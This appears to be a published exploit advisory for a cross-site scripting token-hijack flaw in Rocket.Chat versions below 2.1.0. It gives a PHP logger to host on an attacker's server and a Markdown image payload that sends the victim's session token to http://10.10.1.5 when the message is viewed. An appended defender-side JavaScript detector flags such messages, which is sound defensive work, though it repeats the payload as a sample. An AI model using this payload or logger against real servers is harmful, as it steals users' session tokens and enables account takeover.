#[+] Title: Rocket.Chat - Cross Site Scripting Exploit (Token Hijack)  
#[+] Product: Rocket.Chat  
#[+] Vendor: https://rocket.chat/  
#[+] Vulnerable Version(s): Rocket.Chat < 2.1.0  
#  
#  
# Author : 3H34N  
# Ehsan Nezami  
# Website : nezami.me  
# Twitter : https://twitter.com/mr_ehsane  
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)  
  
  
1. Create l33t.php on a web server   
  
  
<?php  
$output = fopen("logs.txt", "a+") or die("WTF? o.O");  
$leet = $_GET['leet']."\n\n";  
fwrite($output, $leet);  
fclose($output);  
?>  
  
2. Open a chat session  
3. Send the payload with your web server URL  
  
  
![title](http://10.10.1.5/l33t.php?leet=+`{}token`)  
  
4. The token will be written to logs.txt when the target sees your message.
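
A defender-side check, added here and not part of the original advisory or of Rocket.Chat's code: it scans message text for Markdown images shaped like the payload in step 3 (an off-site image URL carrying backticks or braces). The host names, the character list, the severity labels and the sample messages are assumptions constructed for illustration.

```javascript
// Added example: triage chat messages for Markdown images whose target
// resembles the payload shape in step 3. Not Rocket.Chat's own code.

// Assumption: the chat server's own origin; relative image paths resolve here.
const BASE = 'https://chat.example.org';
const TRUSTED_HOSTS = new Set(['chat.example.org']);

// ![alt](target) -- target is everything up to the closing parenthesis.
const MD_IMAGE = /!\[[^\]]*\]\(([^)]*)\)/g;
// Characters that have no business in an image URL typed by a user.
const ODD_CHARS = /[`{}<>"']/;

// Returns one finding per suspicious image in a single message.
function inspectMessage(text) {
  const findings = [];
  for (const m of text.matchAll(MD_IMAGE)) {
    const target = m[1].trim();
    const reasons = [];
    if (ODD_CHARS.test(target)) reasons.push('markup-characters-in-url');
    try {
      const host = new URL(target, BASE).hostname;
      if (!TRUSTED_HOSTS.has(host)) reasons.push('external-host');
    } catch (err) {
      reasons.push('unparseable-url');
    }
    if (reasons.length > 0) findings.push({ target, reasons });
  }
  return findings;
}

// 'alert' when any image has two or more reasons, 'review' for one, else 'ok'.
function triage(messages) {
  return messages.map((text) => {
    const worst = Math.max(0, ...inspectMessage(text).map((f) => f.reasons.length));
    return worst >= 2 ? 'alert' : worst === 1 ? 'review' : 'ok';
  });
}

// Constructed sample messages; the last one is the payload from step 3.
const SAMPLES = [
  'see ![diagram](/file-upload/abc123/diagram.png)',
  '![logo](https://cdn.example.net/logo.png)',
  '![title](http://10.10.1.5/l33t.php?leet=+`{}token`)',
];

console.log(triage(SAMPLES));
```

Run it over exported message bodies to find messages worth reviewing on servers that were on a version below 2.1.0.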